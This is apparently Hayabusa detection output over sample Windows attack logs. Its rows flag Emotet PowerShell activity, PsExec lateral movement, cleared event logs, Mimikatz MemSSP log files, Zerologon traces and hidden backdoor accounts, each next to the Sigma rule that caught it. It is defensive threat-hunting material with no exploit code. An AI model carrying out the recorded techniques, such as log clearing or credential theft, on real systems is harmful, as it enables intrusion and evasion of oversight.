747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 19:08:37.678 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\AppData\Local\Microsoft\CLR_v4.0 | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 19:08:37.678 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\AppData\Local\Microsoft\CLR_v4.0\UsageLogs | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 19:08:37.678 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\TransactionLog.exe.log | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 19:09:27.981 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\pagefile.sys | Process: C:\Windows\System32\smss.exe | PID: 304 | PGUID: 747F3D96-E34B-5F44-0000-00107D2F0000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 19:09:27.988 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\swapfile.sys | Process: C:\Windows\System32\smss.exe | PID: 304 | PGUID: 
747F3D96-E34B-5F44-0000-00107D2F0000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-26 14:09:28.845 +09:00,DESKTOP-RIPCLIP,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/emotet/exec_emotet_ps_4104.evtx +2020-08-26 14:09:33.504 +09:00,DESKTOP-RIPCLIP,1,info,,Process Created,"Cmd: ""C:\Users\Clippy\AppData\Local\Temp\word\2019\Dyxxur4gx.exe"" | Process: C:\Users\Clippy\AppData\Local\Temp\WOrd\2019\Dyxxur4gx.exe | User: DESKTOP-RIPCLIP\Clippy | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" | LID: 0x2b4c2 | PID: 7448 | PGUID: 075C05C2-EE8D-5F45-8401-000000000400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/emotet/exec_emotet_sysmon_1.evtx +2020-08-26 14:09:33.504 +09:00,DESKTOP-RIPCLIP,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/emotet/exec_emotet_sysmon_1.evtx +2020-08-27 20:40:56.397 +09:00,04246w-win10.threebeesco.com,11,info,,File Created,Path: C:\Windows\PSEXESVC.exe | Process: System | PID: 4 | PGUID: B5CF5917-721E-5F46-0000-0010EB030000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx +2020-08-27 20:40:56.397 +09:00,04246w-win10.threebeesco.com,11,low,Exec,PsExec Tool Execution,,rules/sigma/file_event/file_event_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx +2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,info,,Process Created,Cmd: C:\WINDOWS\PSEXESVC.exe | Process: C:\Windows\PSEXESVC.exe | User: NT AUTHORITY\SYSTEM 
| Parent Cmd: C:\WINDOWS\system32\services.exe | LID: 0x3e7 | PID: 4320 | PGUID: B5CF5917-9BC8-5F47-0000-001042AB2001,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx +2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,low,Exec,PsExec Service Start,,rules/sigma/process_creation/proc_creation_win_psexesvc_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx +2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,low,Exec,PsExec Tool Execution,,rules/sigma/process_creation/proc_creation_win_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx +2020-09-02 20:47:39.499 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx +2020-09-02 20:47:48.570 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: a-jbrown | Computer: 04246W-WIN10 | IP Addr: 172.16.66.142 | LID: 0x21a8c68,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx +2020-09-02 20:47:48.823 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: a-jbrown | Computer: - | IP Addr: 172.16.66.142 | LID: 0x21a8c80,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx +2020-09-02 20:47:48.842 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: a-jbrown | 
Computer: - | IP Addr: 172.16.66.142 | LID: 0x21a8c9a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx +2020-09-04 18:28:22.280 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | CreateKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 18:28:22.280 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Local Account Created or Deleted | SetValue: HKLM\SAM\SAM\Domains\Account\Users\Names\support\(Default): Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 18:28:42.976 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | DeleteKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 19:03:04.489 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | CreateKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | 
PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 19:03:04.489 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Local Account Created or Deleted | SetValue: HKLM\SAM\SAM\Domains\Account\Users\Names\support\(Default): Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 19:33:31.843 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | CreateKey: HKLM\SAM\SAM\Domains\Account\Users\Names\sqlsvc | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 19:33:31.843 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Local Account Created or Deleted | SetValue: HKLM\SAM\SAM\Domains\Account\Users\Names\sqlsvc\(Default): Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 19:45:30.650 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Account Added or Deleted from Local Administrators Group | SetValue: HKLM\SAM\SAM\Domains\Builtin\Aliases\00000220\C: 
Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 19:45:33.802 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Account Added or Deleted from Local Administrators Group | SetValue: HKLM\SAM\SAM\Domains\Builtin\Aliases\00000220\C: Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 19:54:20.005 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Account Added or Deleted from Local Administrators Group | SetValue: HKLM\SAM\SAM\Domains\Builtin\Aliases\00000220\C: Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 19:54:20.005 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | DeleteKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 19:54:22.974 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | 
CreateKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 19:54:22.974 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Local Account Created or Deleted | SetValue: HKLM\SAM\SAM\Domains\Account\Users\Names\support\(Default): Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 20:00:13.713 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | DeleteKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 20:00:24.602 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | CreateKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 20:00:24.602 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Local Account Created or Deleted 
| SetValue: HKLM\SAM\SAM\Domains\Account\Users\Names\support\(Default): Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 20:02:16.084 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Account Added or Deleted from Local Administrators Group | SetValue: HKLM\SAM\SAM\Domains\Builtin\Aliases\00000220\C: Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-05 22:28:40.585 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\WerFault.exe -u -p 3004 -s 632 | Process: C:\Windows\System32\WerFault.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog | LID: 0x3e5 | PID: 3424 | PGUID: 747F3D96-9288-5F53-1902-00000000E500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx +2020-09-05 22:33:34.590 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\WerFault.exe -u -p 3668 -s 4420 | Process: C:\Windows\System32\WerFault.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog | LID: 0x3e5 | PID: 4688 | PGUID: 747F3D96-93AE-5F53-3602-00000000E500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx +2020-09-05 22:34:11.983 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: 
""LogonUI.exe"" /flags:0x4 /state0:0xa3cea855 /state1:0x41c64e6d | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 6556 | PGUID: 747F3D96-93D3-5F53-3802-00000000E500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx +2020-09-05 22:37:07.245 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x2 /state0:0xa3bd2855 /state1:0x41c64e6d | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 1008 | PGUID: 747F3D96-130C-5F54-1300-00000000E600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx +2020-09-09 22:18:23.627 +09:00,MSEDGEWIN10,4625,low,,Logon Failure - Wrong Password,User: IEUser | Type: 2 | Computer: MSEDGEWIN10 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_4624_4625_LogonType2_LogonProc_chrome.evtx +2020-09-11 02:48:47.077 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: c:\windows\system32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 388 | PGUID: 747F3D96-66F7-5F5A-0500-00000000F600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_smss_child_proc_bootexecute_setupexecute.evtx +2020-09-11 02:48:47.077 +09:00,MSEDGEWIN10,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_smss_child_proc_bootexecute_setupexecute.evtx +2020-09-11 21:10:22.398 +09:00,MSEDGEWIN10,11,info,,File 
Created,Path: C:\Windows\System32\mimilsa.log | Process: C:\Windows\system32\lsass.exe | PID: 640 | PGUID: 747F3D96-672C-5F5B-0D00-00000000FC00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_Mimikatz_Memssp_Default_Logs_Sysmon_11.evtx +2020-09-11 21:10:22.398 +09:00,MSEDGEWIN10,11,critical,CredAccess,Mimikatz MemSSP Default Log File Creation,,rules/sigma/file_event/file_event_mimimaktz_memssp_log_file.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_Mimikatz_Memssp_Default_Logs_Sysmon_11.evtx +2020-09-14 23:44:04.878 +09:00,Sec504Student,1102,high,Evas,Security Log Cleared,User: Sec504,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/eventlog-dac.evtx +2020-09-14 23:44:14.393 +09:00,Sec504Student,4674,medium,Persis,Possible Hidden Service Attempt,Svc: nginx | User: Sec504 | LID: 0x99e3d | AccessMask: %%1539,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/DeepBlueCLI/eventlog-dac.evtx +2020-09-14 23:46:33.690 +09:00,Sec504Student,4674,medium,Persis,Possible Hidden Service Attempt,Svc: nginx | User: Sec504 | LID: 0x99e3d | AccessMask: %%1539,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/DeepBlueCLI/eventlog-dac.evtx +2020-09-14 23:48:28.683 +09:00,Sec504Student,4674,medium,Persis,Possible Hidden Service Attempt,Svc: nginx | User: Sec504 | LID: 0x99e3d | AccessMask: %%1539,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/DeepBlueCLI/eventlog-dac.evtx +2020-09-16 03:04:36.333 +09:00,MSEDGEWIN10,1102,high,Evas,Security Log Cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/Runas_4624_4648_Webshell_CreateProcessAsUserA.evtx +2020-09-16 03:04:39.987 +09:00,MSEDGEWIN10,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: svc01 | Target User: IEUser | IP Address: - | Process: C:\Windows\System32\inetsrv\w3wp.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Runas_4624_4648_Webshell_CreateProcessAsUserA.evtx +2020-09-16 04:28:17.594 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx +2020-09-16 04:28:31.453 +09:00,01566s-win16-ir.threebeesco.com,104,high,Evas,System Log File Cleared,User: a-jbrown,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_CVE-2020-1472_DFIR_System_NetLogon_Error_EventID_5805.evtx +2020-09-16 04:29:51.507 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: 02694W-WIN10 | IP Addr: 172.16.66.37 | LID: 0x31ff6e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx +2020-09-16 04:29:51.517 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: 02694W-WIN10 | IP Addr: 172.16.66.37 | LID: 0x31ff89,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx 
+2020-09-16 18:31:19.133 +09:00,01566s-win16-ir.threebeesco.com,4720,high,Persis,Hidden User Account Created! (Possible Backdoor),User: $ | SID: S-1-5-21-308926384-506822093-3341789130-107103,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx +2020-09-16 18:31:19.133 +09:00,01566s-win16-ir.threebeesco.com,4720,high,Evas,New or Renamed User Account with '$' in Attribute 'SamAccountName'.,,rules/sigma/builtin/security/win_new_or_renamed_user_account_with_dollar_sign.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx +2020-09-16 18:32:13.647 +09:00,01566s-win16-ir.threebeesco.com,4720,high,Persis,Hidden User Account Created! (Possible Backdoor),User: $ | SID: S-1-5-21-308926384-506822093-3341789130-107104,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx +2020-09-16 18:32:13.647 +09:00,01566s-win16-ir.threebeesco.com,4720,high,Evas,New or Renamed User Account with '$' in Attribute 'SamAccountName'.,,rules/sigma/builtin/security/win_new_or_renamed_user_account_with_dollar_sign.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx +2020-09-17 19:57:37.013 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx +2020-09-17 19:57:44.254 +09:00,01566s-win16-ir.threebeesco.com,4776,info,,NTLM Logon To Local Account,User: Administrator | Computer: 02694W-WIN10 | Status: 
0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx +2020-09-17 19:57:44.270 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: 02694W-WIN10 | IP Addr: 172.16.66.37 | LID: 0x853237,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx +2020-09-20 06:12:15.920 +09:00,01566s-win16-ir.threebeesco.com,12,medium,,Registry Key Create/Delete_Sysmon Alert,Machine Account Saved Password Set | CreateKey: HKLM\SECURITY\Policy\Secrets\$MACHINE.ACC\CurrVal | Process: C:\Windows\system32\lsass.exe | PID: 584 | PGUID: 83989F29-0ADD-5F61-0B00-00000000FE00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Sysmon13_MachineAccount_Password_Hash_Changed_via_LsarSetSecret.evtx +2020-09-20 06:12:15.920 +09:00,01566s-win16-ir.threebeesco.com,13,medium,,Registry Key Value Set_Sysmon Alert,Machine Account Saved Password Set | SetValue: HKLM\SECURITY\Policy\Secrets\$MACHINE.ACC\CurrVal\(Default): Binary Data | Process: C:\Windows\system32\lsass.exe | PID: 584 | PGUID: 83989F29-0ADD-5F61-0B00-00000000FE00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Sysmon13_MachineAccount_Password_Hash_Changed_via_LsarSetSecret.evtx +2020-09-20 06:14:32.852 +09:00,01566s-win16-ir.threebeesco.com,12,medium,,Registry Key Create/Delete_Sysmon Alert,Machine Account Saved Password Set | CreateKey: HKLM\SECURITY\Policy\Secrets\$MACHINE.ACC\CurrVal | Process: C:\Windows\system32\lsass.exe | PID: 584 | PGUID: 
